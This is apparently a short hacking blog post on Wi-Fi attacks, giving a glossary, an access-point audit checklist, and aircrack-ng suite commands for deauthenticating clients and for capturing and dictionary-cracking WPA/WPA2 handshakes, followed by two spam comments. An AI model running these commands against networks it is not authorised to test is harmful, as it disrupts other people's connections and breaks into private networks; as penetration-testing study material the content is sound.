WIFI Hacking!


Hello Hackers!

In this blog I am going to show you the basic things about WIFI hacking. Special thanks to Akshay for  well written content :)





################## KEY WORDS ###################

MAC - Media Access Control
BSSID - Basic Service Set Identifier
ESSID - Extended Service Set Identifier
SNR - Signal to Noise Ratio
PSK - Pre Shared Key
WPA - WiFi Protected Access
WEP - Wired Equivalent Privacy
WPS - Wi-fi Protected Setup




Test points:
-------------
# Is the AP running the latest firmware and security patches?
# Has the factory default ESSID been changed?
# Has the default administrative login/password been changed?
# Is the administrative password easily cracked?
# Are stronger authentication options available ?
# Are there any unnecessary ports open (e.g., Telnet, HTTP, SNMP,)?
# Are those open ports vulnerable to known exploits?
# Are encrypted administrative interfaces available (e.g., SSH, HTTPS)?
# Have security alerts or logs been enabled ?
# Are its security parameters consistent with defined policy?
# If the AP is using a PreShared Key (PSK), is it easily cracked?
# If the AP is not using WPA2, can it be upgraded to do so?
# Can the AP withstand simulated 802.11 DoS attacks (e.g., flood attack)?


De-authentication Attack
---------------------------
airodump-ng --channel <ch #> --bssid <mac id> wlan0mon

aireplay-ng --deauth <# of deauth packets> -a <AP mac> -c <client mac> wlan0mon



WPA/WPA2 Cracking:
-------------------

(!) airmon-ng start wlan0
    # Get the wireless card in monitoring mode to capture the traffic.

(!) airodump-ng wlan0mon
    # Start to listen the network traffic and get BSSID & ESSID of targets

(!) airodump-ng --bssid <bssid of AP> -c <ch #> --write <filename> wlan0mon
    # Avoid extra noise from traffic by listening to a single target.
    # Get the BSSID of the clients connected to the target.
    # Write the dump to a file, which may also contain the 4 way handshake.

(!) aireplay-ng --deauth <# of frames> -a <AP bssid> wlan0mon
    # Deauthenticate clients of target and force them to establish the 4 way handshake.
    # 4 way handsake will be captured in our file as the dumping is running the background.

(!) aircrack-ng <filename> -w <wordlist>


    # Crack the key form the captured file by providing a wordlist





2 comments:

  1. Thanks To Ur Block
    And
    http://www.horizonss.co.in/web-development-2/

    web development company|website design company|web development company in india|web development company in usa
    Call:+91-9057710001,2,6

    #web development company
    #website design company
    #web development company in india
    #web development company in usa
    #webdevelopmentcompany
    #webdesigncompany
    #websitedesigncompany
    #websitedevelopmentcompany
    #web #development #company
    #website #design #company
    #web #development #company #in #india
    #web #development #company #in #usa

    ReplyDelete
  2. File Security

    Secure File sharing - Add file access control and file IOs monitor on the fly with Windows file system mini-filter driver component in C#, C++ demo source code.

    ReplyDelete

WIFI Hacking!

Hello Hackers! In this blog I am going to show you the basic things about WIFI hacking.   Special thanks to Akshay for   well writ...